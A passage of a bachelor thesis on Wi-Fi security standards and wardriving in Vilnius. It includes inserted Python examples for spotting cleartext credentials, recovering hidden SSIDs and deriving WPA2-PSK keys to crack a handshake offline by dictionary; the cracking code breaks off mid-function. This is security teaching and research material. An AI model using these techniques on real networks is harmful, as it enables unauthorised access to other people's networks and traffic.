This document is a thesis on modern wireless security and wardriving in Vilnius, Lithuania. It begins with an introduction to wireless technologies like Wi-Fi and a review of current wireless security measures. It then details attacks that can break various Wi-Fi security standards like WEP, WPA, and WPA2. The document performs wardriving in two districts of Vilnius and analyzes the results. It finds differences in the number of open networks and outdated WEP security between districts. In conclusion, the thesis demonstrates modern wireless vulnerabilities and the prevalence of wireless networks in Vilnius.
FlechaMoreno_Bachelor_Thesis
VILNIAUS GEDIMINO TECHNIKOS UNIVERSITETAS
FUNDAMENTINIŲ MOKSLŲ FAKULTETAS
INFORMACINIŲ TECHNOLOGIJŲ KATEDRA
Alejandro Flecha Moreno
Modern Wireless Security Analysis and Wardriving of the city of Vilnius
Saugumo užtikrinimas šiuolaikiniuose beviliuose tinkluose ir neapsaugotų prieigos vietų paieška Vilniaus mieste bei priežasčių analizė
Supervisor: Dr. Nikolaj Goranin
Vilnius, 2016
DEDICATION
This thesis is dedicated to my family, whose dedication, commitment, effort and unconditional support made the development of this work possible.
To my fellow students, with whom I shared knowledge and experiences that forged a great bond of friendship.
INDEX
GRATITUDES
SUMMARY
1. INTRODUCTION
1.1 OBJECTIVES
1.1.1 General
1.1.2 Specific
1.2 PRACTICAL VALUE
2. REVIEW OF WIRELESS TECHNOLOGIES
2.1 WI-FI TECHNOLOGY. BRIEF INTRODUCTION
2.2 RADIO FREQUENCY AND SIGNAL
2.3 NETWORK INFRASTRUCTURE AND TOPOLOGIES
2.4 ACTUAL SECURITY MEASURES IN Wi-Fi
2.4.1 INTRODUCTION
2.4.2 OPEN TYPE NETWORKS
2.4.3 WEP SECURITY
2.4.4 WPA SECURITY
2.4.5 WPA2 SECURITY
2.5 ANALYSIS OF HOW TO BREAK CURRENT WIFI SECURITY
2.5.1 INTRODUCTION
2.5.2 ATTACKS ON OPEN NETWORKS
2.5.3 ATTACKS ON WEP TECHNOLOGY
2.5.4 ATTACKS ON WPA AND WPA2 TECHNOLOGY
2.5.5 CONCLUSION ON WI-FI WEAKNESS POINTS
2.6 INTRODUCTION TO WARDRIVING
3. ATTACKS ON WI-FI WEAKNESS POINTS
3.1 INTRODUCTION
3.2 ATTACK ON WEP TECHNOLOGY
3.3 ATTACK ON WPA & WPA2 TECHNOLOGY THROUGH WPS
3.4 CONCLUSION ON PRACTICAL WI-FI ATTACKS
4. WARDRIVING IN THE CITY OF VILNIUS
4.1 TECHNOLOGY USED
4.2 PRACTICAL WARDRIVING
4.2.1 WARDRIVING IN THE DISTRICT OF ŠNIPIŠKĖS
4.2.2 WARDRIVING IN THE DISTRICT OF ŠEŠKINĖ
4.2.3 COMPARISON OF BOTH WARDRIVING
4.2.4 CONCLUSION ON THE COMPARISON
5. FINAL CONCLUSION
6. BIBLIOGRAPHY
7. ANNEX
8. ANNEX OF IMAGES
GRATITUDES
To the University of León, which educated me as a professional.
To Vilniaus Gedimino Technikos Universitetas, which allowed me to experience living and studying abroad.
To Dr. Javier Alfonso Cendón, whose help and support made it possible to write this thesis from Lithuania and to get through all the paperwork that was required.
To Dr. Nikolaj Goranin, whose support, recommendations and guidance during the development of this thesis were a great contribution to reaching this point.
To Dr. Chema Alonso, whose recommendation of the book „Hacking práctico de Redes Wi-Fi y radiofrecuencia“ (Practical hacking of Wi-Fi networks and radio frequency) was of great help in developing the theoretical part of this work.
SUMMARY
This thesis studies the different types of Wi-Fi network security in use today and the ways in which each of them can be broken; a wardriving survey then shows how deeply this wireless technology is embedded in our daily lives.
The work begins with an analysis of the security measures currently found in Wi-Fi networks around the world, using, among other sources, a book recommended by Dr. Chema Alonso.
The theoretical analysis covers not only the different Wi-Fi security types but also the attacks that break those security measures, drawing on the book mentioned above and on many other websites and books.
Once the strengths and weaknesses were known, an attack on WEP and an attack on WPA2 were carried out to show how easily this can be done today.
The practical part of this thesis also includes a wardriving survey, performed to obtain evidence of how widely this technology has been deployed in a modern city such as Vilnius.
The wardriving brought some interesting facts to light. Studying them made it possible to examine several aspects of Vilnius and its wireless networks, such as the differences between two districts of the city, the number of OPEN networks and the number of networks that still use WEP as their security algorithm.
1. INTRODUCTION
Wireless security, and our dependence on wireless technology, is on everyone's lips at the time of writing. Movies and television programs show how easy it is to access our data unlawfully: TV series such as the recently awarded "Mr. Robot", and the demonstrations of hackers known worldwide such as Dr. Chema Alonso on national television, only prove the point. Such demonstrations highlight the weakness of a technology that is already part of our lives.
Despite all this information, which keeps reminding us how fragile our privacy and security in the digital world are, the vast majority of people still connect to the Internet every day through free access points, or hotspots. These hotspots, easily found in restaurants, bars or airports, have no security, so anyone with the right knowledge could read our traffic at will, as Chema Alonso himself took care to show in prime time.
This thesis is not only about the security, or the lack of it, of OPEN networks. The security systems in use today also have vulnerabilities. The strengths and weaknesses of the most common Wi-Fi security types, from WEP to WPA2, are studied here, in both a theoretical and a practical study.
Lithuania has been recognized as the country that offers the best free Wi-Fi service, ahead of richer countries such as Singapore or the United Kingdom. The tests were conducted in nearly 200 countries, with Lithuania as the clear winner. [1]
By carrying out a wardriving survey in Vilnius I hope to get an idea of the impact of Wi-Fi technology in a city of just 300,000 inhabitants and to see how many OPEN Wi-Fi networks can be detected on a normal day.
Various sources were used for this thesis. The bibliography is extensive and varied, since the topic, as mentioned above, is highly topical at present. Most of the sources are easily found on the Internet, although a book recommended by Dr. Chema Alonso has also been used.
1.1 OBJECTIVES
1.1.1 General
To study the strengths and weaknesses of current Wi-Fi technology and to perform a wardriving survey in the city of Vilnius.
1.1.2 Specific
1. Study the strengths and weaknesses of WEP, WPA and WPA2.
2. Attempt to break WEP security and analyse the process.
3. Perform a wardriving survey in different districts of the city of Vilnius.
4. Perform a statistical analysis of the information collected.
1.2 PRACTICAL VALUE
This thesis has several practical values. On one hand, from a scientific point of view, a wardriving survey is very interesting because it lets us understand and picture the spread of wireless technology at the time of writing. A wardriving survey of a modern city such as Vilnius can give us a lot of information, for example the ratio of inhabitants to wireless networks, or various percentages.
On the other hand, actually breaking WEP and WPA2, after the weak points of the different encryption systems and the attacks on them have been explained, has plenty of practical value. Showing how easily those technologies can be broken, even without deep knowledge of the topic, makes us realize how vulnerable they are. This thesis aims to show how important it is to keep our encryption system up to date, and how users must take care of their own privacy when using OPEN networks in restaurants or at the airport.
This thesis has been the student's first approach to the subject, and on its completion the student knows how to break WEP and WPS.
"Measurement is the first step that leads to control and eventually to improvement. If you can't measure something, you can't understand it. If you can't understand it, you can't control it. If you can't control it, you can't improve it." H. James Harrington.
2. REVIEW OF WIRELESS TECHNOLOGIES
Wireless communication technologies have peaked in recent years, something that could be predicted (and in fact was) long ago. A technology that was conceived to replace wired networks in some scenarios has grown exponentially, thanks to the use of laptops, smartphones, tablets, etc.
This has been possible not only because today's hardware uses Wi-Fi as its main means of access to the Internet, but also because of the need to be always online and connected (many programs and applications now require being online in order to work). Users all around the world, of all ages and social classes, use wireless networks as their usual way of accessing the Internet, and a large majority of them use only wireless technologies.
There is another booming category of Wi-Fi use in the professional sphere: tablets and pads. Today tablets can be found in almost every restaurant, shop, airport, hospital, etc., used to access not just the Internet but the intranet, so that data can be exchanged quickly from the workstation.
In the early years of these devices (smartphones, tablets and so on), Internet access was provided by the data networks owned by the mobile operators (Vodafone, Telefónica...).
Nevertheless, the usage, bandwidth and data volumes needed to serve all the users requesting those services mean that the data networks based on GPRS, EDGE, 3G, HSPA and 4G are having problems such as overload, and their maintenance and upgrades are becoming more and more difficult.
That is why Internet access is based, more and more every day, on domestic, private (restaurant, bar, shop...), corporate and/or public (station, airport...) Wi-Fi wireless networks.
During those years of growth, setting up a proper level of security was a tedious, boring task, and in some cases there was no security at all. The need to protect personal and corporate data was overlooked during the first years of deployment of those technologies, which produced insecure networks that allowed no security at all or made it very hard to implement.
In addition, the communication protocols used in the upper layers of the OSI model sent data without any kind of encryption. Protocols such as POP3, SMTP, SNMP and FTP can still be "captured" with a sniffer, and their contents, passwords included, read as plain text.
Awareness of the need for security in communications began a few years ago, and it has been growing in our mentality and, more importantly, among network administrators and protocol and application designers. But even today the consequences of the lack of security in the early Internet are suffered by those who try to implement security functions. For example, the lack of security is present in connections made from public sites or in networks with a poor security implementation. An example can be found in the interview given by Dr. Chema Alonso to the Spanish TV program "Salvados" [2], where, using nothing but a free program, he was able to obtain a victim's e-mail and password.
In fact, we should recall the OSI model:
Picture 1: OSI Model
As the image above shows, the OSI model has seven layers. The questions should be: in which of those layers must security measures be applied? Which one is responsible? If we ask ourselves these questions, we find that there is not one single answer but many. No single layer is responsible for security; all of them must carry some security measures.
Security is necessary in all of them because nowadays we are used to open, public Wi-Fi networks. One big issue with public Wi-Fi networks is that we lose control of the lower layers of the OSI model, and the only layer left to us is layer seven (the application layer). That last layer must therefore provide some security measure of its own, so that if the traffic is intercepted it is encrypted and impossible to read. Two of the most popular applications today, WhatsApp and Skype, are examples of this.
In this thesis, Wi-Fi technology and the different security measures found today will be explained, together with the different ways to break (or try to break) into the Wi-Fi technology described.
A study of the city of Vilnius, by means of a wardriving survey, will also be carried out. The goal of the wardriving is to analyze, once all the different security measures have been studied, how easy it would be to gain access to private data in a real environment.
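The two points made above (that POP3, SMTP, SNMP and FTP still travel as plain text, and that on a public hotspot only the application layer is left to protect the data) can be checked against a packet capture. The audit below is an added example, not code from the thesis: it scans constructed TCP/UDP segments (documentation-range addresses, made-up credentials) and reports every service that sends a credential in the clear, while the same mailbox fetched over TLS on port 995 produces nothing a passive listener could use. Port numbers and command prefixes are the standard ones; the `Segment`/`Finding` types and the `audit` function are this example's own names.

```python
"""Audit captured application-layer traffic for protocols that carry
credentials in cleartext (POP3, SMTP, FTP, SNMP) versus TLS-protected ones.
All sample segments are constructed; addresses are documentation ranges."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    src: str
    dst: str
    dport: int
    proto: str      # "tcp" or "udp"
    payload: bytes


@dataclass(frozen=True)
class Finding:
    service: str
    client: str
    server: str
    detail: str


# Cleartext services named in the thesis, keyed by (destination port, transport).
CLEARTEXT_SERVICES = {(110, "tcp"): "POP3", (25, "tcp"): "SMTP",
                      (21, "tcp"): "FTP", (161, "udp"): "SNMP"}
# Leading bytes of the commands that carry a credential in each line-oriented protocol.
CREDENTIAL_COMMANDS = {"POP3": (b"USER ", b"PASS "), "FTP": (b"USER ", b"PASS "),
                       "SMTP": (b"AUTH LOGIN", b"AUTH PLAIN")}


def is_tls_record(payload: bytes) -> bool:
    """TLS record header: content type 0x16 (handshake) and major version 3."""
    return len(payload) >= 5 and payload[0] == 0x16 and payload[1] == 0x03


def snmp_version(payload: bytes):
    """Version field of a BER-encoded SNMP message (0 = v1, 1 = v2c, 3 = v3), or None
    if the header does not match. Short-form lengths only (messages under 128 bytes)."""
    if len(payload) < 7 or payload[0] != 0x30 or payload[2:4] != b"\x02\x01" or payload[5] != 0x04:
        return None
    return payload[4]


def audit(segments):
    """Return one Finding per segment that exposes a credential in cleartext."""
    findings = []
    for seg in segments:
        service = CLEARTEXT_SERVICES.get((seg.dport, seg.proto))
        if service is None or is_tls_record(seg.payload):
            continue          # unknown service, or TLS (also after STARTTLS): opaque to a listener
        if service == "SNMP":
            version = snmp_version(seg.payload)
            if version in (0, 1):   # v1/v2c: the community string is the only "secret"
                findings.append(Finding(service, seg.src, seg.dst,
                                        f"SNMPv{'1' if version == 0 else '2c'} community string in cleartext"))
            continue
        for command in CREDENTIAL_COMMANDS[service]:
            if seg.payload.upper().startswith(command):
                # Report the command, not its argument: the audit log must not become a password store.
                findings.append(Finding(service, seg.src, seg.dst,
                                        f"{command.decode().strip()} sent in cleartext"))
                break
    return findings


# Constructed capture: what a passive listener on an OPEN hotspot would see.
SAMPLE_CAPTURE = [
    Segment("192.0.2.10", "198.51.100.5", 110, "tcp", b"USER alice\r\n"),
    Segment("192.0.2.10", "198.51.100.5", 110, "tcp", b"PASS correct-horse\r\n"),
    Segment("192.0.2.11", "198.51.100.6", 21, "tcp", b"USER bob\r\n"),
    Segment("192.0.2.12", "198.51.100.7", 25, "tcp", b"AUTH LOGIN\r\n"),
    Segment("192.0.2.12", "198.51.100.7", 25, "tcp", b"EHLO laptop\r\n"),      # no credential
    # abbreviated SNMPv2c GetRequest with community "public"
    Segment("192.0.2.13", "198.51.100.8", 161, "udp",
            b"\x30\x16\x02\x01\x01\x04\x06public\xa0\x09\x02\x01\x01\x02\x01\x00\x02\x01\x00"),
    # the same mailbox fetched over POP3S: only a TLS ClientHello is visible
    Segment("192.0.2.10", "198.51.100.5", 995, "tcp", b"\x16\x03\x03\x00\x05\x01\x00\x00\x01\x00"),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_CAPTURE):
        print(f"{finding.service:5} {finding.client} -> {finding.server}: {finding.detail}")
```

Run as a script it lists five findings (POP3 USER and PASS, FTP USER, SMTP AUTH LOGIN, SNMPv2c community) and nothing for the POP3S segment, which is exactly the contrast the text draws: the lower layers of an open hotspot protect nothing, so the application protocol itself has to.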
2.1 WI-FI TECHNOLOGY. BRIEF INTRODUCTION
In order to understand this thesis work, the first that must be done, is to understand Wi-
Fi technology. Therefore, an explanation, as briefly as possible, the evolution of the
wireless technology known as Wi-Fi and the standards that are regulating it, is going to
be carried out.
Those standards that nowadays seem like something normal, or not special, have been
one of the most important pillars in the development of the protocols of communications
Wi-Fi is based on.
But before Wi-Fi networks, there were another designs of wireless networks, but not as
good as Wi-Fi, since they were technologies property of various manufacturers. The main
problem was that those systems did not communicate with other systems of different
manufacturers. This was a huge problem, since it made very difficult to commercialize
them.
To solve this problem, and to reach that all the manufacturers foment that technology in
the same way, it was decided to unify some of those technologies and to develop groups
of work within IEEE (Institute of Electrical and Electronics Engineers). IEEE is an
international society integrated by engineers that promote the development of open
technologies as standards.
IEEE already had groups of works, working on 802.x, dedicated to the data
communication networks like Ethernet (802.3).
In 1992, another society called ETSI (European Telecommunications Standards Institute)
was developing another standard called Hiperlan (High Performance Radio LAN) for
high-speed wireless networks. But it did not succeed, since IEEE offered more
commercial guarantees.
Looking at the table above, the working group 802.11 is the one dedicated to WLAN
(Wireless Local Area Network) wireless networks.
It is important to distinguish between Wi-Fi, WLAN and 802.11. Wi-Fi is a trademark
registered by the Wi-Fi Alliance to certify products that comply with the 802.11 standards
published by IEEE. WLAN refers simply to local wireless networks, and 802.11 is the
family of standards itself.
This group was created in the 1990s, and it defines how wireless networks (WLANs)
operate in the two lowest layers of the OSI model: the physical layer (layer one) and the
data link layer (layer two). Protocols such as IP and TCP, among others, are responsible
for the remaining layers.
Next, the different IEEE working groups and standards related to Wi-Fi are listed:
1. 802.11 legacy.
2. 802.11b.
3. 802.11a.
4. 802.11c.
5. 802.11d.
6. 802.11e.
7. 802.11F.
8. 802.11g.
9. 802.11h.
10. 802.11i.
11. 802.11Ir.
12. 802.11j.
13. 802.11k.
14. 802.11n.
15. 802.11p.
16. 802.11r.
17. 802.11u.
18. 802.11v.
19. 802.11w.
20. 802.11ac.
21. 802.11af.
22. 802.11ad.
23. 802.11ah.
Of those, the most important ones for this work are 802.11g, 802.11i and 802.11n, together
with one of the most recent amendments, 802.11ac, approved in 2014.
802.11g: 802.11g, also known as 802.11g-2003, was approved in 2003. It brought the
OFDM technology introduced with 802.11a, with a theoretical rate of 54 Mb/s (around
30 Mb/s in practice), to the 2.4 GHz ISM band. It also incorporated an optional legacy
mode compatible with 802.11b, so access points certified for 802.11g can interoperate
with older 802.11b stations.
A non-standard specification, called 802.11g+, could offer speeds of up to 108 Mb/s, but
only by using proprietary protocols of some manufacturers. 802.11g uses OFDM
modulation and keeps DSSS for 802.11b compatibility.
The way 802.11g+ works will not be explained in full here; the main point is that
802.11g+, at least the Texas Instruments variant [3], uses schemes such as frame
concatenation and packet bursting.
Picture 2: example of how frame concatenation works.
802.11i: 802.11i is a standard for wireless local area networks (WLANs) that provides
improved encryption for networks using the popular 802.11a, 802.11b and 802.11g
standards. It defines two new data confidentiality protocols: the Temporal Key Integrity
Protocol (TKIP), designed to run on existing hardware, and CCMP, based on the Advanced
Encryption Standard (AES). The 802.11i standard was officially ratified by IEEE in June
2004 and became part of the 802.11 family of wireless network specifications.
The 802.11i specification offers a level of security sufficient to satisfy most government
agencies. However, AES-CCMP generally needs hardware support in the wireless chipset,
which may mean hardware upgrades for many existing Wi-Fi networks.
Other features of 802.11i are PMK caching, which allows fast reconnection for users who
have temporarily gone offline, and pre-authentication, which allows fast roaming and is
ideal for latency-sensitive applications such as Voice over Internet Protocol (VoIP).
Its implementation is known as WPA2. It was widely used even before its final
ratification: part of its technology had already been released as WPA.
802.11n: the 802.11n working group was set up in 2004 and the amendment was ratified in
2009. The aim of 802.11n was to improve network performance significantly beyond the
previous standards (mostly 802.11b and 802.11g), raising the maximum transmission rate
from 54 Mbps to 600 Mbps. Common two-stream equipment reaches 300 Mbps at the
physical layer, more than five times the 54 Mbps of the previous standards.
Picture 3: 802.11n and 802.11g example
To reach this, it implements MIMO technology (Multiple Input, Multiple Output).
A brief explanation of how MIMO technology works follows:
Picture 4: example of MIMO technology
As can be seen in the picture above, MIMO technology allows the use of multiple
antennas, radios and spatial streams at the same time. One MIMO feature is known as
Three-Stream, which uses three spatial streams to dramatically increase the wireless
speed. The channel width is also very important. It is usually 20 MHz, but 802.11n allows
40 MHz channels by bonding two contiguous 20 MHz channels to achieve greater speed.
Like 802.11i, this standard was long awaited and was widely implemented before its
ratification.
802.11n is not restricted to a single band: it allows the use of both the 2.4 GHz and
5 GHz bands. 802.11n also keeps a legacy mode, so it is compatible with the previous
standards, and it additionally offers a greenfield mode without this legacy support.
But not everything is perfect with 802.11n. Since it can use 40 MHz channels, interference
problems may appear, which complicates the deployment of several access points close
to each other.
Nowadays, several devices offer, theoretically, 600 Mbps of bandwidth, although their real
throughput is closer to 100 Mbps.
802.11ac: 802.11ac, also marketed as 5G Wi-Fi or Gigabit Wi-Fi, was approved in
January 2014. It was designed as the successor of 802.11n. It is also built on MIMO, but
the channel width was increased to 80 MHz, with an optional 160 MHz formed from two
80 MHz channels. Its goal is to reach a throughput of 1 Gb/s, using only the 5 GHz band.
Dual-band 802.11ac equipment remains backwards compatible with 802.11b/g/n on
2.4 GHz and with 802.11a/n on 5 GHz.
The difference between 802.11ac and 802.11n is that the speed is significantly better in
802.11ac, as can be seen in the image below.
Picture 5: comparative of speed between 802.11n and 802.11ac
1.3 Gbps is the speed most commonly cited for 802.11ac (three spatial streams on an
80 MHz channel). This is 1300 Mbps, or roughly 162 MB/s. It is vastly quicker than the
450 Mbps (0.45 Gbps) headline speed quoted for the highest-performing 802.11n routers.
But it must be remembered that those are theoretical speeds, not real ones. In the many
tests available on the Internet, 802.11n performance tends to top out at around
50-150 Mbit/s, while reviews of draft 802.11ac routers have typically found performance
closer to 250-300 Mbit/s. This means that 802.11ac is, more or less, 2.5 times faster than
802.11n.
Range also matters: 5 GHz (802.11ac) signals do not reach as far as 2.4 GHz (802.11n)
signals do, but the 5 GHz band is less crowded, meaning much less interference from
neighbouring Wi-Fi networks.
802.11ac also supports beamforming.
Beamforming technology
Rather than radiating the wireless signal equally in all directions, Wi-Fi with
beamforming detects where the devices are and intensifies the signal in their
direction(s), as can be seen in the image below:
Picture 6: example of how beamforming works in 802.11ac
2.2 RADIO FREQUENCY AND SIGNAL
Another important topic for wireless networks and communications is the radio
spectrum: how it is classified into bands and what its characteristics are. This is needed
to understand wireless networks.
The radio spectrum is a fraction of the electromagnetic spectrum. Electromagnetic waves
can be natural (like solar radiation) or artificial (like the waves used by mobile phones).
The radio spectrum includes just the waves used for communications (radio, telephone,
Internet, etc.).
Those waves are known as radio frequency waves. The radio spectrum spans the
frequencies between 10 kHz and 3000 GHz.
Picture 7: Band distribution in the radio electric spectrum.
The spectrum is regulated in bands, each running from an initial frequency to a final one.
Inside those bands a certain number of channels is defined, so that a frequency can be
referred to in an easier and more efficient way. For example, Wi-Fi falls within the UHF
(2.4 GHz) and SHF (5 GHz) bands.
2.3 NETWORK INFRASTRUCTURE AND TOPOLOGIES.
AVAILABLE INFRASTRUCTURES
A. Access point
B. Distribution System
C. Station
Access point: network equipment that operates over the radio frequency network, used
as an intermediary in wireless communications between devices and to extend a wired
network into a wireless one. The access point is discoverable because it has a network
name, the SSID (Service Set IDentifier). This name is advertised by the access point in
beacon frames, sent by default about ten times per second (a beacon interval of 100 time
units, roughly 102 ms). Those frames carry information about the network, and stations
use the beacons to locate the network and to measure how strong its signal is. Nowadays
the access point can be configured not to broadcast the SSID, so the name of our access
point will not be advertised in beacons; however, this does not offer a higher level of
security, since the SSID still appears in clear in the probe and association frames
whenever a station connects to the access point.
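To make the last point concrete, the following Python example (added here; it is not part of the original thesis) parses the tagged-parameter area of two 802.11 management frame bodies: a beacon whose SSID element is empty, as a "hidden" access point sends it, and the association request in which the connecting station has to name the network in clear. Both frame bodies, the network name "VilniusNet" and the rate and channel elements are constructed for the example; the 100 TU beacon interval is the usual default.

```python
import struct

# Element IDs from the 802.11 tagged-parameter area.
SSID_IE = 0
SUPPORTED_RATES_IE = 1
DS_PARAM_IE = 3


def parse_ies(data):
    """Split a tagged-parameter area into (element id, value) pairs.

    Each element is: id (1 byte), length (1 byte), value. A truncated
    trailing element is dropped instead of being misread.
    """
    ies = []
    pos = 0
    while pos + 2 <= len(data):
        eid, length = data[pos], data[pos + 1]
        value = data[pos + 2:pos + 2 + length]
        if len(value) != length:
            break
        ies.append((eid, value))
        pos += 2 + length
    return ies


def ssid_from_beacon(body):
    """Beacon body = timestamp(8) + beacon interval(2) + capability(2) + IEs.

    Returns the advertised name, or None for a hidden network: an access
    point configured not to broadcast its SSID sends an empty element
    (or, in some implementations, one filled with NUL bytes).
    """
    for eid, value in parse_ies(body[12:]):
        if eid == SSID_IE:
            if value.strip(b"\x00") == b"":
                return None
            return value.decode("utf-8", "replace")
    return None


def ssid_from_assoc_request(body):
    """Association request body = capability(2) + listen interval(2) + IEs.

    The station has to name the network here, in clear, so this is where a
    hidden SSID is exposed to anyone capturing the channel.
    """
    for eid, value in parse_ies(body[4:]):
        if eid == SSID_IE and value:
            return value.decode("utf-8", "replace")
    return None


def beacons_per_minute(beacon_body):
    """The beacon interval is in time units of 1024 us; the default of 100 TU
    is about 102.4 ms, i.e. roughly ten beacons per second."""
    interval_tu = struct.unpack_from("<H", beacon_body, 8)[0]
    return round(60_000 / (interval_tu * 1.024))


def build_ie(eid, value):
    return bytes([eid, len(value)]) + value


# Constructed sample frame bodies (not captured from a real network).
RATES = build_ie(SUPPORTED_RATES_IE, bytes([0x82, 0x84, 0x8B, 0x96]))
HIDDEN_BEACON = (struct.pack("<QHH", 0x1234, 100, 0x0411)   # timestamp, 100 TU, capability
                 + build_ie(SSID_IE, b"")                     # hidden: zero-length SSID
                 + RATES
                 + build_ie(DS_PARAM_IE, bytes([6])))         # channel 6
ASSOC_REQUEST = (struct.pack("<HH", 0x0411, 10)              # capability, listen interval
                 + build_ie(SSID_IE, b"VilniusNet")           # the name, in clear
                 + RATES)

if __name__ == "__main__":
    print("beacon SSID:", ssid_from_beacon(HIDDEN_BEACON))          # None (hidden)
    print("assoc SSID:", ssid_from_assoc_request(ASSOC_REQUEST))     # VilniusNet
    print("beacons/min:", beacons_per_minute(HIDDEN_BEACON))         # 586
```

The same parser applies to probe requests and probe responses, which carry the SSID element at the start of their body; a wardriving tool that keeps the BSSID seen in hidden beacons and matches it against later association frames recovers the name without ever sending a frame.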
Picture 8: example of an access point
Distribution system: the distribution system (DS) allows the exchange of data between
different access points that cooperate to form an infrastructure. Among other functions,
the DS allows a station's session to be handed over between access points while roaming.
The DS can also be wireless (WDS), allowing infrastructures of several access points
working collaboratively without being joined by a network cable.
Picture 9: example of a DS
Station: the client computer or device that connects to an access point to use its network
services is a station. An access point can play the role of a station of another access
point, creating another kind of infrastructure. The station decides, automatically by
protocol, to connect to the access point that best fulfils its requirements and offers the
best signal level (strength), and it can roam between access points sharing the same
SSID. All stations have the hardware (WNIC: Wireless Network Interface Controller) and
software (drivers and firmware) needed to connect to a network and meet its
requirements.
Wi-Fi networks also define several structural models, depending on their design and
topology:
1. BSS or Basic Service Set.
2. ESS or Extended Service Set.
3. IBSS or Independent Basic Service Set.
Access points can also be found operating in the following modes:
1. Bridge mode.
2. Repeater mode.
3. WDS mode (Wireless Distribution System).
4. Client (STA) mode.
2.4 CURRENT SECURITY MEASURES IN Wi-Fi
2.4.1 INTRODUCTION
Nowadays, different types of security can be found in Wi-Fi networks. Since their first
appearance, the security protocols that govern such networks have changed, and a lot.
Today the WPA and WPA2 security protocols provide a level of security never enjoyed
before, but multiple vulnerabilities have already been discovered, some of them really
interesting.
Below are the various kinds of protocol and/or Wi-Fi network that can be found nowadays:
1. OPEN networks (no security).
2. Networks with WEP security.
3. Networks with WPA security.
4. Networks with WPA2 security.
Brief history
The first wireless networks lacked any security measure or data encryption. The reason
was simple: there was no perceived need for it. With the popularization of the
technology, users and system administrators began to require a minimum of security;
sales fell and the industry got down to work. There are many differences between wired
and wireless networks, but the main one, as the name suggests, is physical access to the
network. To access a wired network, physical access to the cabling is required.
Meanwhile, to access a wireless network, compatible equipment and a suitable distance
are enough. In response to this emerging demand, Wired Equivalent Privacy (WEP)
appeared. With its implementation consumer confidence was restored, even though WEP
was soon targeted by attackers and before long this new technology was "broken".
Nowadays, wireless network security rests on WPA and on its newer version, WPA2.
Even though WPA and WPA2 are not perfect, and some vulnerabilities have recently been
discovered, WPA2 is the best option for protecting a wireless network from attacks by
third parties.
2.4.2 OPEN TYPE NETWORKS
As its name indicates, an OPEN network has no security at all. These networks can easily
be found at restaurants and airports and, at the time of writing, more and more cities
around the world are installing them in their squares and streets. They are meant to be
an easy, fast and, most of the time, free way to get access to the Internet.
2.4.3 WEP SECURITY
WEP was the first security protocol widely deployed by the industry. It includes an
authentication exchange between the station and the access point and encryption of the
data frames based on the RC4 stream cipher. This encryption engine, along with other
functions such as the CRC-32 integrity check and the generation of a small (24-bit)
initialization vector (IV), is implemented in the wireless adapter chipset.
In less than a year, WEP was exploited and its vulnerabilities were in the public domain.
2.4.4 WPA SECURITY
Once the shortcomings of WEP were discovered, the industry demanded a reliable, durable
and safe system, and it had to be compatible with all the hardware that had already been
sold (RC4 cryptographic engine, random number generator, etc.).
The answer came from a working group within IEEE, 802.11i, whose draft work the Wi-Fi
Alliance released as a new security system called WPA (Wi-Fi Protected Access).
Picture 10: how WPA-PSK works
But there was a problem with WPA: the full 802.11i standard was not ready for
publication.
The working group was pushed by the industry to release the part of the protocol that was
already mature, of which the home variant is WPA-PSK (Pre-Shared Key).
WPA-PSK provides an enhanced security system that covers the holes of WEP, and it can
run on hardware that supported WEP through a firmware and/or driver update.
WPA-PSK is fitted with an encryption type called TKIP, based on RC4, but it also
incorporates other control mechanisms (per-packet key mixing and a 48-bit IV used as a
sequence counter against replay) and expands the size of the encryption key. It also
replaces WEP's CRC-32 with a new message integrity check, the MIC known as Michael.
Picture 11: differences and similarities between WPA and WPA2
As discussed before, WPA was launched before its conclusion because WEP had been
revealed as an inadequate security measure.
WPA-PSK is safer than WEP, but it is unsuitable for a business environment. The reason
is that WPA-PSK is based on a pre-shared key, and in a business environment this is not
acceptable: the key must be shared with every user, so it is easily compromised, and it
is the same for all connections. Whoever knows the key can decrypt not only their own
traffic but, by capturing the other clients' handshakes, the entire network traffic.
As mentioned before, most of these security measures (MIC, PMK, etc.) appeared before
they were finished, and some manufacturers implemented their own variants, so nowadays
some hybrid WPA can easily be found: WPA with AES, Dynamic WEP or WEP+, among
other hybrids.
Attacks on a network with WPA encryption are quite different from attacks on a network
with WEP encryption. As mentioned before, WPA was meant to fix all the vulnerabilities
of WEP.
Since the cipher key cannot be recovered statistically as in a WEP network, the only
option is a brute-force attack based on a dictionary. Those attacks must be
dictionary-based because, given the length and complexity of the passphrase (8 to 63
characters), an exhaustive search may take years.
Besides, in order to attack a WPA network it is necessary to have some legitimate users
connected. This is required because the authentication process between the access point
and the user, known as the WPA handshake (the four-way handshake), has to be captured;
in this process the session keys are derived and confirmed.
It must be noted that cracking a captured WPA handshake offline is only possible on
networks with WPA-PSK (Pre-Shared Key), since in WPA-PSK, as in WEP, there is a single
pre-shared key known to all the clients.
But even though all the clients use one and the same passphrase to connect, different
session keys are established. These keys change with time and are different for every
device, since they are derived from the pre-shared key together with the random nonces
and MAC addresses exchanged in each handshake.
This means that, even knowing the pre-shared key, it is not possible to decrypt from a
packet capture the traffic generated by all the clients, but only the traffic of those
clients whose handshake has been captured.
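The two points above (the dictionary attack on a captured handshake, and the fact that the pre-shared key alone does not give the per-client keys) can be checked with the following Python example, added here and not part of the original thesis. It implements the WPA2-PSK key derivation from 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID), PTK = PRF-384 over the two MAC addresses and the two nonces, and the EAPOL-Key MIC of message 2 computed with the first 16 bytes of the PTK (the KCK). The SSID "VilniusNet", the two MAC addresses, the nonces, the passphrase "Vilnius2015" and the word list are all constructed for the example; the handshake is built by the same code and then "cracked" offline as an attacker would do from a capture.

```python
import hashlib
import hmac
import struct


def derive_pmk(passphrase, ssid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenation of HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) ||
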